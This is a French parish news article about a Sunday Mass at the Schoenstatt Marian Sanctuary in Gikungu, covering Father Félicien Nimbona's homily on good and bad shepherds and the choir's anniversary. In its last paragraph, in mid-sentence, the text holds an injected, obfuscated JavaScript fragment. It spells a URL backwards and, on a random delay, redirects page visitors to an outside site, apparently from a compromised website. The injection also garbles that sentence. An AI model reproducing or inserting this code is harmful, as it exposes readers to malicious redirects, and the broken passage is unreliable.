En ce 16e dimanche du temps ordinaire, la Messe de 9h30 au Sanctuaire marial de Schoenstatt Mont Sion Gikungu a été présidée par le Père Félicien Nimbona, Recteur dudit Sanctuaire. « Jésus nous rappelle qu’il est le Bon Pasteur. Le dimanche passé, nous avions entendu comment Jésus a envoyé ses apôtres deux à deux et nous entendrons aujourd’hui le rapport de leurs missions. » Telle a été l’introduction du Père Recteur lors de cette Messe qui était animée par la Chorale Sainte Maria Goretti.

Le Père Félicien, au début de son homélie, a imploré l’Esprit Saint pour qu’il vienne sur tous ceux qui étaient là. Il a expliqué qui est le Pasteur et a ajouté qu’il est malheureux ce leader qui n’accompli pas scrupuleusement sa mission. En disant cela, le Père Nimbona a pris repère sur les écrits de la Bible surtout le livre d’Isaïe (56,1 ; 56, 10-11 et 5,8). Tous ces mots ont été dits par les apôtres et ils n’avaient peur de personne. Ces passages montrent que plusieurs leaders ont été de mauvais exemples à leurs subalternes.

Il a aussi ajouté le chapitre 34 du livre d’Ezéchiel. Ce chapitre porte le titre : Les pasteurs d’Israël. Il parle en gros du sort des mauvais leaders, les faux pasteurs et celui de ces brebis, ces dirigés qui se comportent bizarrement. Ce chapitre, a dit le Père Félicien, explique très bien la 2e lecture qui a été tirée du livre des Ephésiens (2, 13-18).

Pour clôturer et invitant l’assemblée à prier les uns pour les autres, le Père Félicien  a dit que la fin de la Messe n’est pas la fin de la prière. C’est plutôt le début de la mission que nous devons accomplir dans nos familles respectives. Il a alors félicité les parents qui acceptent de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner des vies. Il a aussi félicité  la Chorale Sainte Maria Goretti pour leur 11e anniversaire. Pour rappel, cette Chorale est née en 2007. Elle est faite d’enfants de 5 à 20 ans et compte aujourd’hui plus de 150 membres actifs. C’est aussi la cadette des chorales du Sanctuaire marial de Schoenstatt Mont Sion Gikungu.

Jean de Dieu

Laisser un commentaire